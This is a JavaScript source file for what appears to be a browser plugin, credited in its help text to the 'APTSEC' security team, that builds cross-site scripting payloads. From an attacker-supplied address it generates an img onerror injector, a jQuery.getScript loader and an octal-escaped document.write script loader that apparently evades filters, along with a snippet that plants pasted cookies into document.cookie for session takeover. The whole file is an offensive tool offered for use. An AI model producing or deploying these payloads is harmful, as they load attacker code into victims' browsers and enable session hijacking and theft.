
var hook = document.getElementById("hook");
var help = document.getElementById("help");
var duoxuan = document.getElementsByTagName("input");
var shuru = document.getElementById("encode");
var shuchu = document.getElementById("decode");
var getscript = document.getElementById("getscript");
var img = document.getElementById("imgcreate");
var wuweixian = document.getElementById("wuweixian");
var cookie = document.getElementById("cookie");
var bodyload = document.getElementsByTagName('body');
hook.onclick=function()
{
	var address = shuru.value.replace(/http:/,"");
	if(img.checked)
		{
			shuchu.value="<img src=x onerror=document.body.appendChild(createElement(/script/.source)).src=alt alt="+address+">";
		}
	else if(getscript.checked)
		{

			shuchu.value="jQuery.getScript('"+address+"');";
		}
	else if(wuweixian.checked)
	{
		var temp = "<script src="+address+"></script>";
		var jieguo = "";
		for(var i=0;i<temp.length;i++)
				{
					jieguo +="\\"+temp.charCodeAt(i).toString(8);
				}
		shuchu.value="document.write(unescape('"+jieguo+"'))";
	}
	else if(cookie.checked)
	{
		var cookiezhi = shuru.value;
		shuchu.value="var a='"+cookiezhi+"';var cookie=[];cookie=a.split(';');for(var i=0;i<cookie.length;i++){document.cookie=cookie[i]}";
	}
	
}

help.onclick=function()
{
	alert("本插件由APTSEC安全团队 0x_Jin开发，版权所有！如果更改其内容请尊重作者带上版权！此插件不是最终版，如果你在使用过程中发现了BUG或者你有新的功能希望加入到程序中欢迎联系我！联系方式:admin@aptsec.net");
}

